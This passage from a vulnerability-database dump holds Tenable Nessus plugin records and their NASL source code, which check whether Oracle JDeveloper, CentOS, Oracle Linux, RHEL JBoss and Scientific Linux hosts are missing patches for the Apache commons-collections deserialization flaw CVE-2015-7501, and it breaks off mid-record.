script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7940\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jdeveloper\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_jdeveloper_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle JDeveloper\");\n\n exit(0);\n}\n\ninclude('vcf_extras_oracle.inc');\n\nvar app_info = vcf::oracle_jdev::get_app_info();\n\nvar constraints = [\n { 'min_version':'12.1.3.0', 'fixed_version':'12.1.3.0.180525', 'missing_patch':'27800100' },\n { 'min_version':'12.2.1.2', 'fixed_version':'12.2.1.2.180525', 'missing_patch':'27783350' },\n { 'min_version':'12.2.1.3', 'fixed_version':'12.2.1.3.180607', 'missing_patch':'28151020' }\n # Note: 27957723 appears to be the original patch for 12.2.1.3, but is no longer listed\n];\n\nvcf::oracle_jdev::check_version_and_report(\n app_info:app_info,\n severity:SECURITY_WARNING,\n constraints:constraints\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:44:32", "description": "Updated jakarta-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-22T00:00:00", "type": "nessus", "title": "CentOS 5 : jakarta-commons-collections (CESA-2015:2671)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:jakarta-commons-collections", "p-cpe:/a:centos:centos:jakarta-commons-collections-javadoc", "p-cpe:/a:centos:centos:jakarta-commons-collections-testframework", "p-cpe:/a:centos:centos:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:centos:centos:jakarta-commons-collections-tomcat5", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2015-2671.NASL", "href": "https://www.tenable.com/plugins/nessus/87540", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2671 and \n# CentOS Errata and Security Advisory 2015:2671 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87540);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2671\");\n\n script_name(english:\"CentOS 5 : jakarta-commons-collections (CESA-2015:2671)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated jakarta-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new\ninterfaces, implementations, and utilities to extend the features of\nthe Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-December/021558.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7af40c53\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-collections packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"jakarta-commons-collections-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"jakarta-commons-collections-javadoc-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"jakarta-commons-collections-testframework-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"jakarta-commons-collections-tomcat5-3.2-2jpp.4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:44:32", "description": "From Red Hat Security Advisory 2015:2671 :\n\nUpdated jakarta-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-22T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : jakarta-commons-collections (ELSA-2015-2671)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:jakarta-commons-collections", "p-cpe:/a:oracle:linux:jakarta-commons-collections-javadoc", "p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework", "p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:oracle:linux:jakarta-commons-collections-tomcat5", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2015-2671.NASL", "href": "https://www.tenable.com/plugins/nessus/87547", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:2671 and \n# Oracle Linux Security Advisory ELSA-2015-2671 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87547);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2671\");\n\n script_name(english:\"Oracle Linux 5 : jakarta-commons-collections (ELSA-2015-2671)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:2671 :\n\nUpdated jakarta-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new\ninterfaces, implementations, and utilities to extend the features of\nthe Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-December/005654.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-collections packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"jakarta-commons-collections-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"jakarta-commons-collections-javadoc-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"jakarta-commons-collections-testframework-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"jakarta-commons-collections-tomcat5-3.2-2jpp.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:43:06", "description": "Updated packages for the Apache commons-collections library for Red Hat JBoss Enterprise Application Platform 6.4, which fix one security issue, are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.4 on Red Hat Enterprise Linux 5, 6, and 7 are advised to upgrade to these updated packages. The JBoss server process must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-11-24T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 / 7 : JBoss EAP (RHSA-2015:2500)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-eap6", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2015-2500.NASL", "href": "https://www.tenable.com/plugins/nessus/87044", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2500. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87044);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2500\");\n\n script_name(english:\"RHEL 5 / 6 / 7 : JBoss EAP (RHSA-2015:2500)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated packages for the Apache commons-collections library for Red\nHat JBoss Enterprise Application Platform 6.4, which fix one security\nissue, are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.4 on Red\nHat Enterprise Linux 5, 6, and 7 are advised to upgrade to these\nupdated packages. The JBoss server process must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/2045023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2500\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7501\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-commons-collections-eap6 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2500\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL5\", rpm:\"jbossas-welcome-content-eap\") || rpm_exists(release:\"RHEL6\", rpm:\"jbossas-welcome-content-eap\") || rpm_exists(release:\"RHEL7\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL5\", reference:\"apache-commons-collections-eap6-3.2.1-16.redhat_5.1.ep6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"apache-commons-collections-eap6-3.2.1-16.redhat_5.1.ep6.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"apache-commons-collections-eap6-3.2.1-16.redhat_5.1.ep6.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections-eap6\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:46:09", "description": "It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons- collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons- collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nIn the interim, the quickest way to resolve this specific deserialization vulnerability is to remove the vulnerable class files (InvokerTransformer, InstantiateFactory, and InstantiateTransformer) in all commons-collections jar files. Any manual changes should be tested to avoid unforseen complications.\n\nAll running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-22T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : jakarta-commons-collections on SL5.x i386/x86_64 (20151221)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-debuginfo", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-javadoc", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-tomcat5", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20151221_JAKARTA_COMMONS_COLLECTIONS_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/87587", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87587);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7501\");\n\n script_name(english:\"Scientific Linux Security Update : jakarta-commons-collections on SL5.x i386/x86_64 (20151221)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw 